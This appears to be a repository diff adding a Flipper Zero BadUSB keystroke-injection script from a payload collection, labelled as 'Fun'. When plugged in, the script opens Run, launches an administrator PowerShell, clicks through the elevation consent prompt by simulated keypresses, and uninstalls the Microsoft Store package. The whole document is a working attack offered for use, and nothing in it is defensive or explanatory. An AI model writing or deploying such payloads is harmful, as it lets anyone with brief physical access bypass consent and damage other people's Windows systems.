🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/FUN/DeleteMicrosoftStore.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Deletes the Microsoft Store
     3 +REM Version: 1.0
     4 +REM Category: Fun
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 300
     8 +REM Start PowerShell as Admin
     9 +STRING powershell Start-Process powershell -Verb runAs
     10 +DELAY 300
     11 +ENTER
     12 +DELAY 500
     13 +LEFTARROW
     14 +DELAY 450
     15 +ENTER
     16 +DELAY 600
     17 +REM Deletes Microsoft Store
     18 +STRING Get-AppxPackage *windowsstore*|Remove-AppxPackage
     19 +DELAY 200
     20 +ENTER
     21 +
     22 +
     23 + 
Please wait...
Page is in error, reload to recover